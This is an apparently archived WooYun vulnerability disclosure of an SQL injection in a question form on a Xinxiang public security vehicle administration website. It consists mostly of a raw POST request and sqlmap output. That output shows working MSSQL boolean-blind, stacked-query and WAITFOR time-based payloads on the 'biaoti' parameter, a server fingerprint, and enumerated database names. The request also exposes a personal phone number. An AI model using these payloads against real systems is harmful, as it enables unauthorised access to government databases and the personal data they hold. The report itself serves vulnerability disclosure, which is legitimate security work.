乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-31: 细节已通知厂商并且等待厂商处理中 2015-11-03: 厂商已经确认,细节仅向厂商公开 2015-11-13: 细节向核心白帽子及相关领域专家公开 2015-11-23: 细节向普通白帽子公开 2015-12-03: 细节向实习白帽子公开 2015-12-18: 细节向公众公开
新乡市公安局车辆管理所某处SQL注入
http://**.**.**.**/addQuestion.aspx
提交处
POST /addQuestion.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/addQuestion.aspxCookie: CNZZDATA4639901=cnzz_eid%3D319043224-1444190633-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1446195445; ASP.NET_SessionId=w14shfej240auwauczi0akruConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 4269__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE4MjU3Njg2NjgPZBYCAgMPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK%2FpmJ%2FovabnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L%2Bb55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr%2BmYn%2Be7hOe7h%2BWPrOW8gOWFqOW4gua2suS9k%2BWNsemZqei0p%2BeJqee9kOi9pue0p%2BaApeWIh%2BaWreijhee9ruS9v%2BeUqOWfueiureS8muiuriHmlK%2FpmJ%2Fnu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS%2F5Y2P5a2U546J6Iqz5LiA6KGM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv%2BWNj%2BWtlOeOieiKs%2BS4gOihjOiwg%2BeglC4uLmQCAw9kFgJmDxUDAzI1NkXkuqTpgJrnrqHnkIbmlK%2FpmJ%2FovabnrqHmiYDliJvmlrDkvr%2FmsJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5Lqk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr%2BmYn%2Bi9pueuoeaJgOe7hOe7h%2Bingueci%2BOAiuS9nOmjjuW7uuiuvuawuOi%2FnOWcqOi3r%2BS4iuOAi%2BW8uuWMluawkeitpuaAneaDs%2BaVmeiCsiHmlrDkuaHmlK%2FpmJ%2FovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK%2FpmJ%2Fnu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHwAWAB8BAgZkFgxmD2QWAmYPFQMDMjc4LOacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18yMDE1MDkzMC0x5L%2Bh5oGvH%2BacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18uLi5kAgEPZBYCZg8VAwMyNzck5py65Yqo6L2m54mM6K%2BB5YWs5ZGK5L2c5bqfXzIwMTUwOTMwH%2BacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18uLi5kAgIPZBYCZg8VAwMyNzYg6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAxNTEwMDgd6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAuLi5kAgMPZBYCZg8VAwMyNzQg6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAxNTA5MDId6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAuLi5kAgQPZBYCZg8VAwMyNzEh6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hLTIwMTUwODAzHempvuagoeWfueiurei0qOmHj%2Be7n%2BiuoS0yLi4uZAIFD2QWAmYPFQMDMjY5IOmpvuagoeWfueiurei0qOmHj%2Be7n%2BiuoTIwMTUwNzA2HempvuagoeWfueiurei0qOmHj%2Be7n%2BiuoTIwLi4uZAIFDzwrAAkBAA8WBB8AFgAfAQIGZBYMZg9kFgJmDxUDAzI0MA%2Fpu4TmoIfovablrprkuYkP6buE5qCH6L2m5a6a5LmJZAIBD2QWAmYPFQMDMTg5M%2Bays%2BWNl%2BecgeWunuaWveOAiOagoei9puWuieWFqOeuoeeQhuadoeS%2Bi%2BOAieWKnuazlSHmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhaguLi5kAgIPZBYCZg8VAwMxMjg85YWz5LqO5Yqg5by65aSW5Zyw6L2s5YWl5py65Yqo6L2m5o6S5rCU5rGh5p%2BT566h55CG55qE6YCa55%2BlIeWFs%2BS6juWKoOW8uuWkluWcsOi9rOWFpeacuuWKqC4uLmQCAw9kFgJmDxUDAzEyNSHmnLrliqjovablvLrliLbmiqXlup%2FmoIflh4bop4Tlrpoh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeELi4uZAIED2QWAmYPFQMDMTAxSOOAiuacuuWKqOi9pumpvumptuivgeeUs%2BmihuWSjOS9v%2BeUqOinhOWumuOAi%2B%2B8iOWFrOWuiemDqOS7pOesrDEyM%2BWPt%2B%2B8iSHjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkowuLi5kAgUPZBYCZg8VAwMxMDBW44CK5YWs5a6J6YOo5YWz5LqO5L%2Bu5pS5POacuuWKqOi9pueZu%2BiusOinhOWumj7nmoTlhrPlrprjgIvvvIjlhazlronpg6jku6TnrKwxMjTlj7fvvIkf44CK5YWs5a6J6YOo5YWz5LqO5L%2Bu5pS5POacui4uLmQCBw8QZA8WA2YCAQICFgMQBRLpl67nrZTmnI3liqHlkqjor6IFATZnEAUV6am%2B6am25ZGY5bi46KeB6Zeu6aKYBQE3ZxAFFeacuuWKqOi9puW4uOingemXrumimAUBOGdkZAINDw8WAh4EVGV4dAUJeHh4eHh4eHh4ZGQCEQ9kFgJmD2QWAgIBDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHwECAmQWAmYPZBYKZg8PFgIeB1Zpc2libGVoZGQCAQ9kFghmD2QWAmYPFQIFMjYzMTYJeHh4eHh4eHh4ZAIBD2QWAmYPFQEM5pqC5peg5Zue562UZAICD2QWAmYPFQEBMWQCAw9kFgJmDxUBCjIwMTUtMTAtMzBkAgIPZBYIZg9kFgJmDxUCBTI2MDEyCXh4eHh4eHh4eGQCAQ9kFgJmDxUBCeW3suWbnuetlGQCAg9kFgJmDxUBAjg0ZAIDD2QWAmYPFQEJMjAxNS0xMC03ZAIDDw8WAh8EaGRkAgQPDxYCHwRoZGQCHQ9kFgJmDzwrAAkBAA8WBB8AFgAfAQIHZBYOZg9kFgJmDxUCG2h0dHA6Ly93d3cueGlueGlhbmcuZ292LmNuLxXmlrDkuaHluILkurrmsJHmlL%2FlupxkAgEPZBYCZg8VAhdodHRwOi8vd3d3Lnh4enguZ292LmNuLw%2FmlrDkuaHluILmlL%2FljY9kAgIPZBYCZg8VAhdodHRwOi8vd3d3Lnh4ZG9uZ2xpLmNvbQzmlrDosLfliqjliptkAgMPZBYCZg8VAhhodHRwOi8vd3d3Lnh4Z2F3Lmdvdi5jbi8P5paw5Lmh5YWs5a6J572RZAIED2QWAmYPFQInaHR0cDovL2thb3NoaS5qeGVkdC5jb20vemhlbmd6aG91a3MuYXNwHOmpvumptuWRmOeQhuiuuuaooeaLn%2BiAg%2BivlSBkAgUPZBYCZg8VAhdodHRwOi8vd3d3LjE2ODhxY3cuY29tLw%2FmlrDkuaHmsb3ovabnvZFkAgYPZBYCZg8VAhVodHRwOi8vd3d3Lnh4YmFuZy5uZXQM6L2m6am%2B5bCP5biuZBgBBQlHcmlkVmlldzEPPCsACgEIAgFkLYOOTnJAVXpFu5Mi1FmJJXvp7p0%3D&__EVENTVALIDATION=%2FwEWCgKuzoCVAgKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBplpFbtCPwifMPR3ycY1E3%2Frn7Os&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx&Tel=15181869462&E_mail=1521073798%**.**.**.**&TextBox1=%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C&Button1=%E6%8F%90+%E4%BA%A4
sqlmap resumed the following injection point(s) from stored session:---Parameter: biaoti (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAgMPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ovabnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYne7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8muiuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6KGM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAzI1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5Lqk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7hingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHwAWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHje7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otKjph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmnaHkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uuWkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnLrliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpeW6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgIvvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMTAwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5Luk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Yqh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFgIeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQAPFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZAIBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eGRvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kWQCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogIPor5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVENTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBlanAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';IF(1785=1785) SELECT 1785 ELSE DROP FUNCTION Oqyz--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAgMPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ovabnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYne7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8muiuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6KGM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAzI1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5Lqk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7hingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHwAWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHje7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otKjph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmnaHkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uuWkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnLrliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpeW6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgIvvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMTAwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5Luk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Yqh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFgIeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQAPFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZAIBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eGRvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kWQCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogIPor5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVENTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBlanAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';WAITFOR DELAY '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAgMPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ovabnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYne7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8muiuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6KGM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAzI1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5Lqk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7hingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHwAWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHje7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otKjph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmnaHkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uuWkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnLrliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpeW6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgIvvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMTAwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5Luk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Yqh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFgIeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQAPFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZAIBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eGRvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kWQCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogIPor5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVENTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBlanAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx' WAITFOR DELAY '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4---[19:24:24] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[19:24:24] [INFO] fetching database names[19:24:24] [INFO] fetching number of databases[19:24:24] [INFO] resumed: 12[19:24:24] [INFO] resumed: cgs[19:24:24] [INFO] resumed: gongan[19:24:24] [INFO] resumed: master[19:24:24] [INFO] resumed: model[19:24:24] [INFO] resumed: msdb[19:24:24] [INFO] resumed: NewTripKH[19:24:24] [INFO] resumed: 